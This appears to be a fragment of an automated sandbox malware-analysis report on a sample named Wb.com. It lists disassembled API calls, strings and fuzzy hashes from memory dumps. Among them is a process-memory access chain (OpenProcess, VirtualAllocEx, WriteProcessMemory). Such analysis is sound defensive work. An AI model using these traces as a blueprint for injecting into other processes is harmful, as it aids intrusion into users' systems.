                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 010165BF
                                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 010165D6
                                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 010165EE
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 0101660A
                                                                                                                                                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 01016624
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e00409d2e2f102f36dcf0487d5a31fa55044355400ac523efec5dcdc33fb940a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 772f847e2df493f3fd51ea67f55a6d6e3d88c7c1ae27492b5f10ba3533e0c9fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e00409d2e2f102f36dcf0487d5a31fa55044355400ac523efec5dcdc33fb940a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8401A974500314ABEB315F64DE8EB9A7BB8FF14705F000599B6C7610D5DBFAA644CB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDAD2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDAE4
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDAF6
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDB08
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDB1A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 556337c31c14d2cbcc2c6d8fdcdc3a7ab0cd982c65c250d815c6b5f1c2b9867e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8dbdb46b975589e9d8485f58a0204f479d54687c101067883f363e9c306dd311
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 556337c31c14d2cbcc2c6d8fdcdc3a7ab0cd982c65c250d815c6b5f1c2b9867e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F01232D44288AB86B4EB9AEDC1C1EB7DDFE447207950C05F149E7905DB39FC809754
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE262E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2640
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2653
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2664
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2675
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 01338b0aa4dcb14bc26cac8a82f8d7cf3125b44b1c708ddd424d86e0dc87d179
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3132c4227f57e250dd5444306d0deeeb02cd96d964a5a4bd9b8886e6daa4916d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01338b0aa4dcb14bc26cac8a82f8d7cf3125b44b1c708ddd424d86e0dc87d179
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AF0D0748051549B86B1AF95EC4184C77A8BF247613050606F5D4A626ED73E0912FF94
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                        • Opcode ID: c9e29229799c36b92bae73a636452890d3bb16ce4705a840d3558195e4cfbc6f
                                                                                                                                                                                                                                                                                                        • Instruction ID: d86e97273b416c0c3c06e5c54ed8c56ca7a47aa69771cf478e8ccbfc7bfd73f5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9e29229799c36b92bae73a636452890d3bb16ce4705a840d3558195e4cfbc6f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63D11672D00286DBCB249F6BC8557FAB7B1FF45720F2C415AE9029B290D7359D80EB91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01012B1D,?,?,00000034,00000800,?,00000034), ref: 0101BDF4
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 010130AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01012B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0101BDBF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0101BD1C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01012AE1,00000034,?,?,00001004,00000000,00000000), ref: 0101BD2C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01012AE1,00000034,?,?,00001004,00000000,00000000), ref: 0101BD42
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0101311A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 01013167
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 16729244ce430dd35ab61f7eb0331e92b1af227804fb4983e1bb1abf6be3b63a
                                                                                                                                                                                                                                                                                                        • Instruction ID: bcce75a00d06fa01491b516c9c777062649d219bb49f433b03503e621650f6f3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16729244ce430dd35ab61f7eb0331e92b1af227804fb4983e1bb1abf6be3b63a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88415C76900218BFDB10DBA8CD81AEEBBB8FF55310F004095EA85BB184DB746E84CB61
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\623615\Wb.com,00000104), ref: 00FE1AD9
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE1BA4
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE1BAE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-2976804977
                                                                                                                                                                                                                                                                                                        • Opcode ID: c19f5074a40563c79ecfa2d881f1996f6d360bd379ce918259018e5a219f56f1
                                                                                                                                                                                                                                                                                                        • Instruction ID: d5ade976ab02106bbaad350e55cdcce0f10df3a2fcc9e9d6accc00005127d147
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c19f5074a40563c79ecfa2d881f1996f6d360bd379ce918259018e5a219f56f1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF315E71E04298ABCB31DF9BDC85D9EBBFCFB84720B1441A6E84497211E6748A40EB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0101CBB1
                                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0101CBF7
                                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010829C0,018E5C60), ref: 0101CC40
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: dd5a8495854430c6689b96b8fd7d648272fa6b16bc747f992afd51b4e2f0688d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a765ffc86fe6bf7271d37f74e4cc5e766fe3307139fc8d086802f01625237db
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd5a8495854430c6689b96b8fd7d648272fa6b16bc747f992afd51b4e2f0688d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A41C1712443069FE720DF28DA84B5ABBE8BF84B14F04465DE5E597385CB38E904CB52
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104DCD0,00000000,?,?,?,?), ref: 01044F48
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32 ref: 01044F65
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01044F75
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                                                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                        • Opcode ID: f2ca3e1c653f613492d6b1cb1a817cd1fa03974a5b71b7b06a247f176f0eb6d3
                                                                                                                                                                                                                                                                                                        • Instruction ID: ece9df451e3d4502f68c88e299df80c21edbf75c97b56bba3a915ce9cab8b4af
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2ca3e1c653f613492d6b1cb1a817cd1fa03974a5b71b7b06a247f176f0eb6d3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A431C0B1214205AFEB618E78DC85BEA7BA9EF08334F204725F9B9E21D1D774E8509B50
APIs
  • Part of subcall function 01033DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01033AD4,?,?), ref: 01033DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 01033AD7
• _wcslen.LIBCMT ref: 01033AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 01033B63
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010449DC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010449F0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 01044A14
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 010451A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 010451B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010451B8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 010442DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 010442EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01044312
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0102544D
                                                                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 010254A1
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,0104DCD0), ref: 01025515
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                        • String ID: %lu
                                                                                                                                                                                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                        • Opcode ID: 74310471ef943ff82bde778a7f2d5730abee1efcbf724603141b6118fa93a664
                                                                                                                                                                                                                                                                                                        • Instruction ID: d1820c498d8279462d99c682312aaa6995d6f20c22814030902fe4f93fd29742
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74310471ef943ff82bde778a7f2d5730abee1efcbf724603141b6118fa93a664
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4318174A00109AFD710DF54C984EAABBF8EF08308F1440A8F949DB262DB75EE45DB61
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01044CED
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01044D02
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01044D0F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe6d9f027596c12ab782e427c53f7aef008564440a65a6b1da56ebb9d5b2c242
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4ceefca7498e38e3590c14db4a89c2df9bb7bc4509b69cbcfb47167254e6fee3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe6d9f027596c12ab782e427c53f7aef008564440a65a6b1da56ebb9d5b2c242
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA11E3B1240248BFEF216E69CC46FAB3BE8EF85B64F110525FA91E6090D271D8509B14
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01013712
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013723
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: GetCurrentThreadId.KERNEL32 ref: 0101372A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010136F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01013731
                                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 010138C4
